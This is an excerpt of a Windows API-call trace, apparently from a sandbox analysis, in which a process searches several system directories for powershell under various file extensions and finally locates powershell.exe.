	[0858.336] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.337] SetErrorMode (uMode=0x1) returned 0x1
	[0858.337] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.337] SetErrorMode (uMode=0x1) returned 0x1
	[0858.337] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.337] SetErrorMode (uMode=0x1) returned 0x1
	[0858.337] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.338] SetErrorMode (uMode=0x1) returned 0x1
	[0858.338] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.338] SetErrorMode (uMode=0x1) returned 0x1
	[0858.338] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.338] SetErrorMode (uMode=0x1) returned 0x1
	[0858.338] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.339] SetErrorMode (uMode=0x1) returned 0x1
	[0858.339] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.339] SetErrorMode (uMode=0x1) returned 0x1
	[0858.339] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.339] SetErrorMode (uMode=0x1) returned 0x1
	[0858.340] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.340] SetErrorMode (uMode=0x1) returned 0x1
	[0858.340] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.340] SetErrorMode (uMode=0x1) returned 0x1
	[0858.340] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.341] SetErrorMode (uMode=0x1) returned 0x1
	[0858.341] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.341] SetErrorMode (uMode=0x1) returned 0x1
	[0858.341] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.341] SetErrorMode (uMode=0x1) returned 0x1
	[0858.341] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.342] SetErrorMode (uMode=0x1) returned 0x1
	[0858.342] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.342] SetErrorMode (uMode=0x1) returned 0x1
	[0858.342] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.342] SetErrorMode (uMode=0x1) returned 0x1
	[0858.343] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.343] SetErrorMode (uMode=0x1) returned 0x1
	[0858.343] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.343] SetErrorMode (uMode=0x1) returned 0x1
	[0858.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.343] SetErrorMode (uMode=0x1) returned 0x1
	[0858.344] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.344] SetErrorMode (uMode=0x1) returned 0x1
	[0858.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.344] SetErrorMode (uMode=0x1) returned 0x1
	[0858.344] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.345] SetErrorMode (uMode=0x1) returned 0x1
	[0858.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.345] SetErrorMode (uMode=0x1) returned 0x1
	[0858.345] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.345] SetErrorMode (uMode=0x1) returned 0x1
	[0858.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.346] SetErrorMode (uMode=0x1) returned 0x1
	[0858.346] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.346] SetErrorMode (uMode=0x1) returned 0x1
	[0858.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.347] SetErrorMode (uMode=0x1) returned 0x1
	[0858.347] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.347] SetErrorMode (uMode=0x1) returned 0x1
	[0858.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.347] SetErrorMode (uMode=0x1) returned 0x1
	[0858.347] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.348] SetErrorMode (uMode=0x1) returned 0x1
	[0858.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.348] SetErrorMode (uMode=0x1) returned 0x1
	[0858.348] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.348] SetErrorMode (uMode=0x1) returned 0x1
	[0858.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.349] SetErrorMode (uMode=0x1) returned 0x1
	[0858.349] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.349] SetErrorMode (uMode=0x1) returned 0x1
	[0858.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.349] SetErrorMode (uMode=0x1) returned 0x1
	[0858.350] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.350] SetErrorMode (uMode=0x1) returned 0x1
	[0858.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.350] SetErrorMode (uMode=0x1) returned 0x1
	[0858.350] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.351] SetErrorMode (uMode=0x1) returned 0x1
	[0858.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.351] SetErrorMode (uMode=0x1) returned 0x1
	[0858.351] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.351] SetErrorMode (uMode=0x1) returned 0x1
	[0858.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.352] SetErrorMode (uMode=0x1) returned 0x1
	[0858.352] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.352] SetErrorMode (uMode=0x1) returned 0x1
	[0858.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.352] SetErrorMode (uMode=0x1) returned 0x1
	[0858.353] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.353] SetErrorMode (uMode=0x1) returned 0x1
	[0858.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.353] SetErrorMode (uMode=0x1) returned 0x1
	[0858.353] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.354] SetErrorMode (uMode=0x1) returned 0x1
	[0858.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0858.354] SetErrorMode (uMode=0x1) returned 0x1
	[0858.354] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.354] SetErrorMode (uMode=0x1) returned 0x1
	[0858.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0858.355] SetErrorMode (uMode=0x1) returned 0x1
	[0858.355] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.355] SetErrorMode (uMode=0x1) returned 0x1
	[0858.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0858.355] SetErrorMode (uMode=0x1) returned 0x1
	[0858.356] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.356] SetErrorMode (uMode=0x1) returned 0x1
	[0858.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0858.356] SetErrorMode (uMode=0x1) returned 0x1
	[0858.356] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.357] SetErrorMode (uMode=0x1) returned 0x1
	[0858.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0858.357] SetErrorMode (uMode=0x1) returned 0x1
	[0858.357] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.357] SetErrorMode (uMode=0x1) returned 0x1
	[0858.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0858.358] SetErrorMode (uMode=0x1) returned 0x1
	[0858.358] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x47dab0
